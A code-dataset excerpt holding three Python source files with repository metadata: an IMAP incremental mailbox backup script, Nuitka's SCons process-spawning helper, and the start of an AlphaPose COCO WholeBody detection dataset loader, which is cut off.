hexsha
stringlengths 40
40
| size
int64 1
1.03M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
239
| max_stars_repo_name
stringlengths 5
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
239
| max_issues_repo_name
stringlengths 5
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
239
| max_forks_repo_name
stringlengths 5
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 1
1.03M
| avg_line_length
float64 1
958k
| max_line_length
int64 1
1.03M
| alphanum_fraction
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4a0f0feb0ef3cd24b28f28e8a3c9051151900b19
| 28,185
|
py
|
Python
|
imapbackup.py
|
lpirl/imapbackup
|
167c927d4683487132388db53c6bbaaad258b863
|
[
"MIT"
] | null | null | null |
imapbackup.py
|
lpirl/imapbackup
|
167c927d4683487132388db53c6bbaaad258b863
|
[
"MIT"
] | null | null | null |
imapbackup.py
|
lpirl/imapbackup
|
167c927d4683487132388db53c6bbaaad258b863
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python -u
"""IMAP Incremental Backup Script"""
__version__ = "1.4h"
__author__ = "Rui Carmo (http://taoofmac.com)"
__copyright__ = "(C) 2006-2018 Rui Carmo. Code under MIT License.(C)"
__contributors__ = "jwagnerhki, Bob Ippolito, Michael Leonhard, Giuseppe Scrivano <gscrivano@gnu.org>, Ronan Sheth, Brandon Long, Christian Schanz, A. Bovett, Mark Feit"
# = Contributors =
# http://github.com/markfeit: Allow password to be read from a file
# http://github.com/jwagnerhki: fix for message_id checks
# A. Bovett: Modifications for Thunderbird compatibility and disabling spinner in Windows
# Christian Schanz: added target directory parameter
# Brandon Long (Gmail team): Reminder to use BODY.PEEK instead of BODY
# Ronan Sheth: hashlib patch (this now requires Python 2.5, although reverting it back is trivial)
# Giuseppe Scrivano: Added support for folders.
# Michael Leonhard: LIST result parsing, SSL support, revamped argument processing,
# moved spinner into class, extended recv fix to Windows
# Bob Ippolito: fix for MemoryError on socket recv, http://python.org/sf/1092502
# Rui Carmo: original author, up to v1.2e
# = TODO =
# - Add proper exception handlers to scanFile() and downloadMessages()
# - Migrate mailbox usage from rfc822 module to email module
# - Investigate using the noseek mailbox/email option to improve speed
# - Use the email module to normalize downloaded messages
# and add missing Message-Id
# - Test parseList() and its descendents on other imapds
# - Test bzip2 support
# - Add option to download only subscribed folders
# - Add regex option to filter folders
# - Use a single IMAP command to get Message-IDs
# - Use a single IMAP command to fetch the messages
# - Patch Python's ssl module to do proper checking of certificate chain
# - Patch Python's ssl module to raise good exceptions
# - Submit patch of socket._fileobject.read
# - Improve imaplib module with LIST parsing code, submit patch
# DONE:
# v1.4h
# - Add timeout option
# v1.3c
# - Add SSL support
# - Support host:port
# - Cleaned up code using PyLint to identify problems
# pylint -f html --indent-string=" " --max-line-length=90 imapbackup.py > report.html
import getpass
import os
import gc
import sys
import time
import platform
import getopt
import mailbox
import imaplib
import socket
import re
import hashlib
import gzip
import bz2
class SkipFolderException(Exception):
"""Indicates aborting processing of current folder, continue with next folder."""
pass
class Spinner:
"""Prints out message with cute spinner, indicating progress"""
def __init__(self, message, nospinner):
"""Spinner constructor"""
self.glyphs = "|/-\\"
self.pos = 0
self.message = message
self.nospinner = nospinner
sys.stdout.write(message)
sys.stdout.flush()
self.spin()
def spin(self):
"""Rotate the spinner"""
if sys.stdin.isatty() and not self.nospinner:
sys.stdout.write("\r" + self.message + " " + self.glyphs[self.pos])
sys.stdout.flush()
self.pos = (self.pos+1) % len(self.glyphs)
def stop(self):
"""Erase the spinner from the screen"""
if sys.stdin.isatty() and not self.nospinner:
sys.stdout.write("\r" + self.message + " ")
sys.stdout.write("\r" + self.message)
sys.stdout.flush()
def pretty_byte_count(num):
"""Converts integer into a human friendly count of bytes, eg: 12.243 MB"""
if num == 1:
return "1 byte"
elif num < 1024:
return "%s bytes" % num
elif num < 1048576:
return "%.2f KB" % (num/1024.0)
elif num < 1073741824:
return "%.3f MB" % (num/1048576.0)
elif num < 1099511627776:
return "%.3f GB" % (num/1073741824.0)
else:
return "%.3f TB" % (num/1099511627776.0)
# Regular expressions for parsing
MSGID_RE = re.compile("^Message\-Id\: (.+)", re.IGNORECASE + re.MULTILINE)
BLANKS_RE = re.compile(r'\s+', re.MULTILINE)
# Constants
UUID = '19AF1258-1AAF-44EF-9D9A-731079D6FAD7' # Used to generate Message-Ids
def string_from_file(value):
"""
Read a string from a file or return the string unchanged.
If the string begins with '@', the remainder of the string
will be treated as a path to the file to be read. Precede
the '@' with a '\' to treat it as a literal.
"""
assert isinstance(value, basestring)
if not value or value[0] not in ["\\", "@"]:
return value
if value[0] == "\\":
return value[1:]
with open(os.path.expanduser(value[1:]), 'r') as content:
return content.read().strip()
def download_messages(server, filename, messages, config):
"""Download messages from folder and append to mailbox"""
if config['overwrite']:
if os.path.exists(filename):
print "Deleting", filename
os.remove(filename)
return []
else:
assert('bzip2' != config['compress'])
# Open disk file
if config['compress'] == 'gzip':
mbox = gzip.GzipFile(filename, 'ab', 9)
elif config['compress'] == 'bzip2':
mbox = bz2.BZ2File(filename, 'wb', 512*1024, 9)
else:
mbox = file(filename, 'ab')
# the folder has already been selected by scanFolder()
# nothing to do
if not len(messages):
print "New messages: 0"
mbox.close()
return
spinner = Spinner("Downloading %s new messages to %s" % (len(messages), filename),
config['nospinner'])
total = biggest = 0
# each new message
for msg_id in messages.keys():
# This "From" and the terminating newline below delimit messages
# in mbox files. Note that RFC 4155 specifies that the date be
# in the same format as the output of ctime(3), which is required
# by ISO C to use English day and month abbreviations.
buf = "From nobody %s\n" % time.ctime()
# If this is one of our synthesised Message-IDs, insert it before
# the other headers
if UUID in msg_id:
buf = buf + "Message-Id: %s\n" % msg_id
mbox.write(buf)
# fetch message
typ, data = server.fetch(messages[msg_id], "RFC822")
assert('OK' == typ)
text = data[0][1].strip().replace('\r', '')
if config['thunderbird']:
# This avoids Thunderbird mistaking a line starting "From " as the start
# of a new message. _Might_ also apply to other mail lients - unknown
text = text.replace("\nFrom ", "\n From ")
mbox.write(text)
mbox.write('\n\n')
size = len(text)
biggest = max(size, biggest)
total += size
del data
gc.collect()
spinner.spin()
mbox.close()
spinner.stop()
print ": %s total, %s for largest message" % (pretty_byte_count(total),
pretty_byte_count(biggest))
def scan_file(filename, compress, overwrite, nospinner):
"""Gets IDs of messages in the specified mbox file"""
# file will be overwritten
if overwrite:
return []
else:
assert('bzip2' != compress)
# file doesn't exist
if not os.path.exists(filename):
print "File %s: not found" % filename
return []
spinner = Spinner("File %s" % filename, nospinner)
# open the file
if compress == 'gzip':
mbox = gzip.GzipFile(filename, 'rb')
elif compress == 'bzip2':
mbox = bz2.BZ2File(filename, 'rb')
else:
mbox = file(filename, 'rb')
messages = {}
# each message
i = 0
for message in mailbox.PortableUnixMailbox(mbox):
header = ''
# We assume all messages on disk have message-ids
try:
header = ''.join(message.getfirstmatchingheader('message-id'))
except KeyError:
# No message ID was found. Warn the user and move on
print
print "WARNING: Message #%d in %s" % (i, filename),
print "has no Message-Id header."
header = BLANKS_RE.sub(' ', header.strip())
try:
msg_id = MSGID_RE.match(header).group(1)
if msg_id not in messages.keys():
# avoid adding dupes
messages[msg_id] = msg_id
except AttributeError:
# Message-Id was found but could somehow not be parsed by regexp
# (highly bloody unlikely)
print
print "WARNING: Message #%d in %s" % (i, filename),
print "has a malformed Message-Id header."
spinner.spin()
i = i + 1
# done
mbox.close()
spinner.stop()
print ": %d messages" % (len(messages.keys()))
return messages
def scan_folder(server, foldername, nospinner):
"""Gets IDs of messages in the specified folder, returns id:num dict"""
messages = {}
foldername = '"{}"'.format(foldername)
spinner = Spinner("Folder %s" % foldername, nospinner)
try:
typ, data = server.select(foldername, readonly=True)
if 'OK' != typ:
raise SkipFolderException("SELECT failed: %s" % data)
num_msgs = int(data[0])
# each message
for num in range(1, num_msgs+1):
# Retrieve Message-Id, making sure we don't mark all messages as read
typ, data = server.fetch(
num, '(BODY.PEEK[HEADER.FIELDS (MESSAGE-ID)])')
if 'OK' != typ:
raise SkipFolderException("FETCH %s failed: %s" % (num, data))
header = data[0][1].strip()
# remove newlines inside Message-Id (a dumb Exchange trait)
header = BLANKS_RE.sub(' ', header)
try:
msg_id = MSGID_RE.match(header).group(1)
if msg_id not in messages.keys():
# avoid adding dupes
messages[msg_id] = num
except (IndexError, AttributeError):
# Some messages may have no Message-Id, so we'll synthesise one
# (this usually happens with Sent, Drafts and .Mac news)
typ, data = server.fetch(
num, '(BODY[HEADER.FIELDS (FROM TO CC DATE SUBJECT)])')
if 'OK' != typ:
raise SkipFolderException(
"FETCH %s failed: %s" % (num, data))
header = data[0][1].strip()
header = header.replace('\r\n', '\t')
messages['<' + UUID + '.' +
hashlib.sha1(header).hexdigest() + '>'] = num
spinner.spin()
finally:
spinner.stop()
print ":",
# done
print "%d messages" % (len(messages.keys()))
return messages
def parse_paren_list(row):
"""Parses the nested list of attributes at the start of a LIST response"""
# eat starting paren
assert(row[0] == '(')
row = row[1:]
result = []
# NOTE: RFC3501 doesn't fully define the format of name attributes
name_attrib_re = re.compile("^\s*(\\\\[a-zA-Z0-9_]+)\s*")
# eat name attributes until ending paren
while row[0] != ')':
# recurse
if row[0] == '(':
paren_list, row = parse_paren_list(row)
result.append(paren_list)
# consume name attribute
else:
match = name_attrib_re.search(row)
assert(match is not None)
name_attrib = row[match.start():match.end()]
row = row[match.end():]
#print "MATCHED '%s' '%s'" % (name_attrib, row)
name_attrib = name_attrib.strip()
result.append(name_attrib)
# eat ending paren
assert(')' == row[0])
row = row[1:]
# done!
return result, row
def parse_string_list(row):
"""Parses the quoted and unquoted strings at the end of a LIST response"""
slist = re.compile('\s*(?:"([^"]+)")\s*|\s*(\S+)\s*').split(row)
return [s for s in slist if s]
def parse_list(row):
"""Parses response of LIST command into a list"""
row = row.strip()
paren_list, row = parse_paren_list(row)
string_list = parse_string_list(row)
assert(len(string_list) == 2)
return [paren_list] + string_list
def get_hierarchy_delimiter(server):
"""Queries the imapd for the hierarchy delimiter, eg. '.' in INBOX.Sent"""
# see RFC 3501 page 39 paragraph 4
typ, data = server.list('', '')
assert(typ == 'OK')
assert(len(data) == 1)
lst = parse_list(data[0]) # [attribs, hierarchy delimiter, root name]
hierarchy_delim = lst[1]
# NIL if there is no hierarchy
if 'NIL' == hierarchy_delim:
hierarchy_delim = '.'
return hierarchy_delim
def get_names(server, compress, thunderbird, nospinner):
"""Get list of folders, returns [(FolderName,FileName)]"""
spinner = Spinner("Finding Folders", nospinner)
# Get hierarchy delimiter
delim = get_hierarchy_delimiter(server)
spinner.spin()
# Get LIST of all folders
typ, data = server.list()
assert(typ == 'OK')
spinner.spin()
names = []
# parse each LIST, find folder name
for row in data:
lst = parse_list(row)
foldername = lst[2]
suffix = {'none': '', 'gzip': '.gz', 'bzip2': '.bz2'}[compress]
if thunderbird:
filename = '.sbd/'.join(foldername.split(delim)) + suffix
if filename.startswith("INBOX"):
filename = filename.replace("INBOX", "Inbox")
else:
filename = '.'.join(foldername.split(delim)) + '.mbox' + suffix
# print "\n*** Folder:", foldername # *DEBUG
# print "*** File:", filename # *DEBUG
names.append((foldername, filename))
# done
spinner.stop()
print ": %s folders" % (len(names))
return names
def print_usage():
"""Prints usage, exits"""
# " "
print "Usage: imapbackup [OPTIONS] -s HOST -u USERNAME [-p PASSWORD]"
print " -a --append-to-mboxes Append new messages to mbox files. (default)"
print " -y --yes-overwrite-mboxes Overwite existing mbox files instead of appending."
print " -n --compress=none Use one plain mbox file for each folder. (default)"
print " -z --compress=gzip Use mbox.gz files. Appending may be very slow."
print " -b --compress=bzip2 Use mbox.bz2 files. Appending not supported: use -y."
print " -f --=folder Specifify which folders use. Comma separated list."
print " -e --ssl Use SSL. Port defaults to 993."
print " -k KEY --key=KEY PEM private key file for SSL. Specify cert, too."
print " -c CERT --cert=CERT PEM certificate chain for SSL. Specify key, too."
print " Python's SSL module doesn't check the cert chain."
print " -s HOST --server=HOST Address of server, port optional, eg. mail.com:143"
print " -u USER --user=USER Username to log into server"
print " -p PASS --pass=PASS Prompts for password if not specified. If the first"
print " character is '@', treat the rest as a path to a file"
print " containing the password. Leading '\' makes it literal."
print " -t SECS --timeout=SECS Sets socket timeout to SECS seconds."
print " --thunderbird Create Mozilla Thunderbird compatible mailbox"
print " --nospinner Disable spinner (makes output log-friendly)"
print "\nNOTE: mbox files are created in the current working directory."
sys.exit(2)
def process_cline():
"""Uses getopt to process command line, returns (config, warnings, errors)"""
# read command line
try:
short_args = "aynzbekt:c:s:u:p:f:"
long_args = ["append-to-mboxes", "yes-overwrite-mboxes", "compress=",
"ssl", "timeout", "keyfile=", "certfile=", "server=", "user=", "pass=",
"folders=", "thunderbird", "nospinner"]
opts, extraargs = getopt.getopt(sys.argv[1:], short_args, long_args)
except getopt.GetoptError:
print_usage()
warnings = []
config = {'compress': 'none', 'overwrite': False, 'usessl': False,
'thunderbird': False, 'nospinner': False}
errors = []
# empty command line
if not len(opts) and not len(extraargs):
print_usage()
# process each command line option, save in config
for option, value in opts:
if option in ("-a", "--append-to-mboxes"):
config['overwrite'] = False
elif option in ("-y", "--yes-overwrite-mboxes"):
warnings.append("Existing mbox files will be overwritten!")
config["overwrite"] = True
elif option == "-n":
config['compress'] = 'none'
elif option == "-z":
config['compress'] = 'gzip'
elif option == "-b":
config['compress'] = 'bzip2'
elif option == "--compress":
if value in ('none', 'gzip', 'bzip2'):
config['compress'] = value
else:
errors.append("Invalid compression type specified.")
elif option in ("-e", "--ssl"):
config['usessl'] = True
elif option in ("-k", "--keyfile"):
config['keyfilename'] = value
elif option in ("-f", "--folders"):
config['folders'] = value
elif option in ("-c", "--certfile"):
config['certfilename'] = value
elif option in ("-s", "--server"):
config['server'] = value
elif option in ("-u", "--user"):
config['user'] = value
elif option in ("-p", "--pass"):
try:
config['pass'] = string_from_file(value)
except Exception as ex:
errors.append("Can't read password: %s" % (str(ex)))
elif option in ("-t", "--timeout"):
config['timeout'] = value
elif option == "--thunderbird":
config['thunderbird'] = True
elif option == "--nospinner":
config['nospinner'] = True
else:
errors.append("Unknown option: " + option)
# don't ignore extra arguments
for arg in extraargs:
errors.append("Unknown argument: " + arg)
# done processing command line
return config, warnings, errors
def check_config(config, warnings, errors):
"""Checks the config for consistency, returns (config, warnings, errors)"""
if config['compress'] == 'bzip2' and config['overwrite'] is False:
errors.append(
"Cannot append new messages to mbox.bz2 files. Please specify -y.")
if config['compress'] == 'gzip' and config['overwrite'] is False:
warnings.append(
"Appending new messages to mbox.gz files is very slow. Please Consider\n"
" using -y and compressing the files yourself with gzip -9 *.mbox")
if 'server' not in config:
errors.append("No server specified.")
if 'user' not in config:
errors.append("No username specified.")
if ('keyfilename' in config) ^ ('certfilename' in config):
errors.append("Please specify both key and cert or neither.")
if 'keyfilename' in config and not config['usessl']:
errors.append("Key specified without SSL. Please use -e or --ssl.")
if 'certfilename' in config and not config['usessl']:
errors.append(
"Certificate specified without SSL. Please use -e or --ssl.")
if 'server' in config and ':' in config['server']:
# get host and port strings
bits = config['server'].split(':', 1)
config['server'] = bits[0]
# port specified, convert it to int
if len(bits) > 1 and len(bits[1]) > 0:
try:
port = int(bits[1])
if port > 65535 or port < 0:
raise ValueError
config['port'] = port
except ValueError:
errors.append(
"Invalid port. Port must be an integer between 0 and 65535.")
if 'timeout' in config:
try:
timeout = int(config['timeout'])
if timeout <= 0:
raise ValueError
config['timeout'] = timeout
except ValueError:
errors.append(
"Invalid timeout value. Must be an integer greater than 0.")
return config, warnings, errors
def get_config():
"""Gets config from command line and console, returns config"""
# config = {
# 'compress': 'none' or 'gzip' or 'bzip2'
# 'overwrite': True or False
# 'server': String
# 'port': Integer
# 'user': String
# 'pass': String
# 'usessl': True or False
# 'keyfilename': String or None
# 'certfilename': String or None
# }
config, warnings, errors = process_cline()
config, warnings, errors = check_config(config, warnings, errors)
# show warnings
for warning in warnings:
print "WARNING:", warning
# show errors, exit
for error in errors:
print "ERROR", error
if len(errors):
sys.exit(2)
# prompt for password, if necessary
if 'pass' not in config:
config['pass'] = getpass.getpass()
# defaults
if 'port' not in config:
if config['usessl']:
config['port'] = 993
else:
config['port'] = 143
if 'timeout' not in config:
config['timeout'] = 60
# done!
return config
def connect_and_login(config):
"""Connects to the server and logs in. Returns IMAP4 object."""
try:
assert(not (('keyfilename' in config) ^ ('certfilename' in config)))
if config['timeout']:
socket.setdefaulttimeout(config['timeout'])
if config['usessl'] and 'keyfilename' in config:
print "Connecting to '%s' TCP port %d," % (
config['server'], config['port']),
print "SSL, key from %s," % (config['keyfilename']),
print "cert from %s " % (config['certfilename'])
server = imaplib.IMAP4_SSL(config['server'], config['port'],
config['keyfilename'], config['certfilename'])
elif config['usessl']:
print "Connecting to '%s' TCP port %d, SSL" % (
config['server'], config['port'])
server = imaplib.IMAP4_SSL(config['server'], config['port'])
else:
print "Connecting to '%s' TCP port %d" % (
config['server'], config['port'])
server = imaplib.IMAP4(config['server'], config['port'])
# speed up interactions on TCP connections using small packets
server.sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
print "Logging in as '%s'" % (config['user'])
server.login(config['user'], config['pass'])
except socket.gaierror, e:
(err, desc) = e
print "ERROR: problem looking up server '%s' (%s %s)" % (
config['server'], err, desc)
sys.exit(3)
except socket.error, e:
if str(e) == "SSL_CTX_use_PrivateKey_file error":
print "ERROR: error reading private key file '%s'" % (
config['keyfilename'])
elif str(e) == "SSL_CTX_use_certificate_chain_file error":
print "ERROR: error reading certificate chain file '%s'" % (
config['keyfilename'])
else:
print "ERROR: could not connect to '%s' (%s)" % (
config['server'], e)
sys.exit(4)
return server
def create_folder_structure(names):
""" Create the folder structure on disk """
for imap_foldername, filename in sorted(names):
disk_foldername = os.path.split(filename)[0]
if disk_foldername:
try:
# print "*** mkdir:", disk_foldername # *DEBUG
os.mkdir(disk_foldername)
except OSError, e:
if e.errno != 17:
raise
def main():
"""Main entry point"""
try:
config = get_config()
server = connect_and_login(config)
names = get_names(server, config['compress'], config['thunderbird'],
config['nospinner'])
if config.get('folders'):
dirs = map(lambda x: x.strip(), config.get('folders').split(','))
if config['thunderbird']:
dirs = [i.replace("Inbox", "INBOX", 1) if i.startswith("Inbox") else i
for i in dirs]
names = filter(lambda x: x[0] in dirs, names)
# for n, name in enumerate(names): # *DEBUG
# print n, name # *DEBUG
create_folder_structure(names)
for name_pair in names:
try:
foldername, filename = name_pair
fol_messages = scan_folder(
server, foldername, config['nospinner'])
fil_messages = scan_file(filename, config['compress'],
config['overwrite'], config['nospinner'])
new_messages = {}
for msg_id in fol_messages.keys():
if msg_id not in fil_messages:
new_messages[msg_id] = fol_messages[msg_id]
# for f in new_messages:
# print "%s : %s" % (f, new_messages[f])
download_messages(server, filename, new_messages, config)
except SkipFolderException, e:
print e
print "Disconnecting"
server.logout()
except socket.error, e:
print "ERROR:", e
sys.exit(4)
except imaplib.IMAP4.error, e:
print "ERROR:", e
sys.exit(5)
# From http://www.pixelbeat.org/talks/python/spinner.py
def cli_exception(typ, value, traceback):
"""Handle CTRL-C by printing newline instead of ugly stack trace"""
if not issubclass(typ, KeyboardInterrupt):
sys.__excepthook__(typ, value, traceback)
else:
sys.stdout.write("\n")
sys.stdout.flush()
if sys.stdin.isatty():
sys.excepthook = cli_exception
# Hideous fix to counteract http://python.org/sf/1092502
# (which should have been fixed ages ago.)
# Also see http://python.org/sf/1441530
def _fixed_socket_read(self, size=-1):
data = self._rbuf
if size < 0:
# Read until EOF
buffers = []
if data:
buffers.append(data)
self._rbuf = ""
if self._rbufsize <= 1:
recv_size = self.default_bufsize
else:
recv_size = self._rbufsize
while True:
data = self._sock.recv(recv_size)
if not data:
break
buffers.append(data)
return "".join(buffers)
else:
# Read until size bytes or EOF seen, whichever comes first
buf_len = len(data)
if buf_len >= size:
self._rbuf = data[size:]
return data[:size]
buffers = []
if data:
buffers.append(data)
self._rbuf = ""
while True:
left = size - buf_len
recv_size = min(self._rbufsize, left) # the actual fix
data = self._sock.recv(recv_size)
if not data:
break
buffers.append(data)
n = len(data)
if n >= left:
self._rbuf = data[left:]
buffers[-1] = data[:left]
break
buf_len += n
return "".join(buffers)
# Platform detection to enable socket patch
if 'Darwin' in platform.platform() and '2.3.5' == platform.python_version():
socket._fileobject.read = _fixed_socket_read
# 20181212: Windows 10 + Python 2.7 doesn't need this fix
# (fix leads to error: object of type 'cStringIO.StringO' has no len())
if 'Windows' in platform.platform() and '2.3.5' == platform.python_version():
socket._fileobject.read = _fixed_socket_read
if __name__ == '__main__':
gc.enable()
main()
| 35.542245
| 169
| 0.577009
|
4a0f1011ffbf099c237c4d1374a363f31b3751e6
| 7,267
|
py
|
Python
|
nuitka/build/SconsSpawn.py
|
ronnymajani/Nuitka
|
0083a931e0bd085e4ac9991074b3b8bc05be52b1
|
[
"Apache-2.0"
] | null | null | null |
nuitka/build/SconsSpawn.py
|
ronnymajani/Nuitka
|
0083a931e0bd085e4ac9991074b3b8bc05be52b1
|
[
"Apache-2.0"
] | 1
|
2021-01-05T09:01:31.000Z
|
2021-01-05T09:01:31.000Z
|
nuitka/build/SconsSpawn.py
|
ronnymajani/Nuitka
|
0083a931e0bd085e4ac9991074b3b8bc05be52b1
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020, Kay Hayen, mailto:kay.hayen@gmail.com
#
# Part of "Nuitka", an optimizing Python compiler that is compatible and
# integrates with CPython, but also works on its own.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
""" Spawning processes.
This is to replace the standard spawn implementation with one that tracks the
progress, and gives warnings about things taking very long.
"""
import os
import subprocess
import threading
from nuitka.Tracing import my_print, scons_logger
from nuitka.utils.Timing import TimerReport
from .SconsCaching import runClCache
from .SconsUtils import decodeData
# Thread class to run a command
class SubprocessThread(threading.Thread):
def __init__(self, cmdline, env):
threading.Thread.__init__(self)
self.cmdline = cmdline
self.env = env
self.data = None
self.err = None
self.exit_code = None
self.timer_report = TimerReport(
message="Running %s took %%.2f seconds"
% repr(self.cmdline).replace("%", "%%"),
min_report_time=60,
logger=scons_logger,
)
def run(self):
# execute the command, queue the result
with self.timer_report:
proc = subprocess.Popen(
self.cmdline,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=False,
env=self.env,
)
self.data, self.err = proc.communicate()
self.exit_code = proc.wait()
def getProcessResult(self):
return self.data, self.err, self.exit_code
def runProcessMonitored(cmdline, env):
thread = SubprocessThread(cmdline, env)
thread.start()
# Allow a minute before warning for long compile time.
thread.join(60)
if thread.is_alive():
scons_logger.info(
"Slow C compilation detected, used %.0fs so far, this might indicate scalability problems."
% thread.timer_report.getTimer().getDelta()
)
thread.join()
return thread.getProcessResult()
# To work around Windows not supporting command lines of greater than 10K by
# default:
def getWindowsSpawnFunction(module_mode, lto_mode, source_files):
def spawnWindowsCommand(
sh, escape, cmd, args, env
): # pylint: disable=unused-argument
# The "del" appears to not work reliably, but is used with large amounts of
# files to link. So, lets do this ourselves, plus it avoids a process
# spawn.
if cmd == "del":
assert len(args) == 2
os.unlink(args[1])
return 0
# For quoted arguments that end in a backslash, things don't work well
# this is a workaround for it.
def removeTrailingSlashQuote(arg):
if arg.endswith(r"\""):
return arg[:-1] + '\\"'
else:
return arg
newargs = " ".join(removeTrailingSlashQuote(arg) for arg in args[1:])
cmdline = cmd + " " + newargs
# Special hook for clcache inline copy
if cmd == "<clcache>":
data, err, rv = runClCache(args, env)
else:
data, err, rv = runProcessMonitored(cmdline, env)
if cmd == "link":
# Training newline in some cases, esp. LTO it seems.
data = data.rstrip()
if module_mode:
data = b"\r\n".join(
line
for line in data.split(b"\r\n")
if b" Creating library" not in line
# On localized compilers, the message to ignore is not as clear.
if not (module_mode and b".exp" in line)
)
# The linker will say generating code at the end, due to localization
# we don't know.
if lto_mode:
if len(data.split(b"\r\n")) == 2:
data = b""
elif (
cmd == "cl"
or cmd == "<clcache>"
or os.path.basename(cmd).lower() == "clcache.exe"
):
# Skip forced output from cl.exe
data = data[data.find(b"\r\n") + 2 :]
source_basenames = [
os.path.basename(source_file) for source_file in source_files
]
def check(line):
return line in (b"", b"Generating Code...") or line in source_basenames
data = (
b"\r\n".join(line for line in data.split(b"\r\n") if not check(line))
+ b"\r\n"
)
if data is not None and data.rstrip():
my_print("Unexpected output from this command:", style="yellow")
my_print(cmdline, style="yellow")
if str is not bytes:
data = decodeData(data)
my_print(data, style="yellow", end="")
if err:
if str is not bytes:
err = decodeData(err)
my_print(err, style="yellow", end="")
return rv
return spawnWindowsCommand
def _unescape(arg):
# Undo the damage that scons did to pass it to "sh"
arg = arg.strip('"')
slash = "\\"
special = '"$()'
arg = arg.replace(slash + slash, slash)
for c in special:
arg = arg.replace(slash + c, c)
return arg
class SpawnThread(threading.Thread):
def __init__(self, spawn, *args):
threading.Thread.__init__(self)
self.spawn = spawn
self.args = args
self.timer_report = TimerReport(
message="Running %s took %%.2f seconds"
% (" ".join(_unescape(arg) for arg in self.args[3]).replace("%", "%%"),),
min_report_time=60,
logger=scons_logger,
)
self.result = None
def run(self):
# execute the command, queue the result
with self.timer_report:
self.result = self.spawn(*self.args)
def getSpawnResult(self):
return self.result
def runSpawnMonitored(spawn, sh, escape, cmd, args, env):
thread = SpawnThread(spawn, sh, escape, cmd, args, env)
thread.start()
# Allow a minute before warning for long compile time.
thread.join(60)
if thread.is_alive():
scons_logger.info(
"Slow C compilation detected, used %.0fs so far, this might indicate scalability problems."
% thread.timer_report.getTimer().getDelta()
)
thread.join()
return thread.getSpawnResult()
def getWrappedSpawnFunction(spawn):
def spawnCommand(sh, escape, cmd, args, env):
return runSpawnMonitored(spawn, sh, escape, cmd, args, env)
return spawnCommand
| 29.661224
| 103
| 0.584698
|
4a0f10ab6a03dc53468e295de2b2593e300c70e3
| 4,620
|
py
|
Python
|
alphapose/datasets/coco_wholebody_det.py
|
phamtrongthang123/AlphaPose_infer_folder_video
|
5bb9560a2982c3f6ba4ec6ae5b6d000f9a7b3c64
|
[
"Apache-2.0"
] | 5
|
2020-09-11T09:06:17.000Z
|
2021-12-22T15:46:57.000Z
|
alphapose/datasets/coco_wholebody_det.py
|
phamtrongthang123/AlphaPose_infer_folder_video
|
5bb9560a2982c3f6ba4ec6ae5b6d000f9a7b3c64
|
[
"Apache-2.0"
] | null | null | null |
alphapose/datasets/coco_wholebody_det.py
|
phamtrongthang123/AlphaPose_infer_folder_video
|
5bb9560a2982c3f6ba4ec6ae5b6d000f9a7b3c64
|
[
"Apache-2.0"
] | 2
|
2020-09-11T09:06:20.000Z
|
2021-12-23T15:21:30.000Z
|
# -----------------------------------------------------
# Copyright (c) Shanghai Jiao Tong University. All rights reserved.
# Written by Haoyi Zhu
# -----------------------------------------------------
"""Coco WholeBody Human Detection Box dataset."""
import json
import os
import cv2
import torch
import torch.utils.data as data
from tqdm import tqdm
from alphapose.utils.presets import SimpleTransform
from detector.apis import get_detector
from alphapose.models.builder import DATASET
@DATASET.register_module
class coco_wholebody_det(data.Dataset):
""" Coco WholeBody human detection box dataset.
"""
EVAL_JOINTS = list(range(133))
def __init__(self,
det_file=None,
opt=None,
**cfg):
self._cfg = cfg
self._opt = opt
self._preset_cfg = cfg['PRESET']
self._root = cfg['ROOT']
self._img_prefix = cfg['IMG_PREFIX']
if not det_file:
det_file = cfg['DET_FILE']
self._ann_file = os.path.join(self._root, cfg['ANN'])
if os.path.exists(det_file):
print("Detection results exist, will use it")
else:
print("Will create detection results to {}".format(det_file))
self.write_coco_json(det_file)
assert os.path.exists(det_file), "Error: no detection results found"
with open(det_file, 'r') as fid:
self._det_json = json.load(fid)
self._input_size = self._preset_cfg['IMAGE_SIZE']
self._output_size = self._preset_cfg['HEATMAP_SIZE']
self._sigma = self._preset_cfg['SIGMA']
if self._preset_cfg['TYPE'] == 'simple':
self.transformation = SimpleTransform(
self, scale_factor=0,
input_size=self._input_size,
output_size=self._output_size,
rot=0, sigma=self._sigma,
train=False, add_dpg=False)
def __getitem__(self, index):
det_res = self._det_json[index]
if not isinstance(det_res['image_id'], int):
img_id, _ = os.path.splitext(os.path.basename(det_res['image_id']))
img_id = int(img_id)
else:
img_id = det_res['image_id']
img_path = os.path.join(self._root, self._img_prefix, '%012d.jpg' % img_id)
# Load image
image = cv2.cvtColor(cv2.imread(img_path), cv2.COLOR_BGR2RGB) # scipy.misc.imread(img_path, mode='RGB') is deprecated
imght, imgwidth = image.shape[1], image.shape[2]
x1, y1, w, h = det_res['bbox']
bbox = [x1, y1, x1 + w, y1 + h]
